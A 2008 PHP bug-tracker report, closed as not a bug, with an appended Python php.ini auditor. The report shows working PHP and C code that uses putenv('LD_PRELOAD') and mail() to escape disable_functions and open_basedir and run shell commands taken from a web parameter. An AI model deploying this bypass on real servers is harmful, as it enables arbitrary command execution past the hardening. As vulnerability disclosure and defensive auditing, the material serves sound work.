Bug #46741 putenv()+mail() allows for open_basedir bypass and "disabled" functionality
Submitted: 2008-12-03 16:43 UTC Modified: 2008-12-08 11:59 UTC
Votes:1
Avg. Score:3.0 ± 0.0
Reproduced:1 of 1 (100.0%)
Same Version:1 (100.0%)
Same OS:1 (100.0%)
From: gat3way at gat3way dot eu Assigned:
Status: Not a bug Package: Safe Mode/open_basedir
PHP Version: 5.2.6 OS: Linux
Private report: No CVE-ID: None
 [2008-12-03 16:43 UTC] gat3way at gat3way dot eu
Description:
------------
safe_mode is safe, but the mail() function should check environment variables IMO.

E.g. you can putenv("LD_PRELOAD=evil_library.so"); and since mail() calls /usr/bin/mail, if your library exports a function like getuid() you can bypass open_basedir restrictions and restrictions on program execution, etc.

If you need some more info, please contact me at:

gat3way@gat3way.eu

Milen Rangelov

Reproduce code:
---------------
A PHP script:
<?php
putenv("LD_PRELOAD=/var/www/a.so");
$a=fopen("/var/www/.comm","w");
fputs($a,$_GET["c"]);
fclose($a);
mail("a","a","a","a");
$a=fopen("/var/www/.comm1","r");
while (!feof($a))
{$b=fgets($a);echo $b;}
fclose($a); ?>

A simple library:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int getuid()
{
char *en;
char *buf=malloc(300);
FILE *a;

unsetenv("LD_PRELOAD");
a=fopen("/var/www/.comm","r");
buf=fgets(buf,100,a);
write(2,buf,strlen(buf));
fclose(a); remove("/var/www/.comm");
rename("/var/www/a.so","/var/www/b.so");
buf=strcat(buf," > /var/www/.comm1");
system(buf);
rename("/var/www/b.so","/var/www/a.so");
free(buf);return 0;
}



Expected result:
----------------
execute arbitrary commands even though we have:

disable_functions = dl,system,exec,passthru,shell_exec,popen
open_basedir = /var/www

Actual result:
--------------
The test was successful.

 [2008-12-08 11:59 UTC] jani@php.net
You should disable putenv() as well.
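
Added example (not part of the bug report or of PHP itself): a small Python check over php.ini text that flags the configuration from the report, where open_basedir or disable_functions is relied on while putenv() and mail() are both still callable. The names `parse_ini`, `audit` and `PAGE_CONFIG` are hypothetical, and the sample input is constructed from the two directives quoted in the report.

```python
# Added example: audits php.ini text for the putenv()+mail() combination.
PAGE_CONFIG = """\
; constructed sample, using the two directives quoted in the report
disable_functions = dl,system,exec,passthru,shell_exec,popen
open_basedir = /var/www
"""

def parse_ini(text):
    """Return {directive: value} for simple 'key = value' php.ini lines."""
    directives = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";[":      # comment or section header
            continue
        key, sep, value = line.partition("=")
        if not sep:
            continue
        value = value.strip()
        if value.startswith('"'):            # quoted value: keep what is inside
            value = value[1:].split('"', 1)[0]
        else:                                # unquoted: drop an inline ; comment
            value = value.split(";", 1)[0].strip()
        directives[key.strip().lower()] = value   # a later line overrides
    return directives

def audit(ini_text):
    """Return findings when restrictions exist but putenv() and mail() remain."""
    cfg = parse_ini(ini_text)
    disabled = {f.strip().lower()
                for f in cfg.get("disable_functions", "").split(",") if f.strip()}
    if not disabled and not cfg.get("open_basedir"):
        return []                            # no restriction is being relied on
    if "putenv" in disabled or "mail" in disabled:
        return []                            # the combination is not available
    return ["putenv() and mail() are both enabled: the mail binary inherits "
            "an environment set by the script; add putenv to disable_functions"]

if __name__ == "__main__":
    for label, text in (("as reported", PAGE_CONFIG),
                        ("putenv disabled", PAGE_CONFIG.replace("popen", "popen,putenv"))):
        print(label, "->", audit(text) or "ok")
```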
 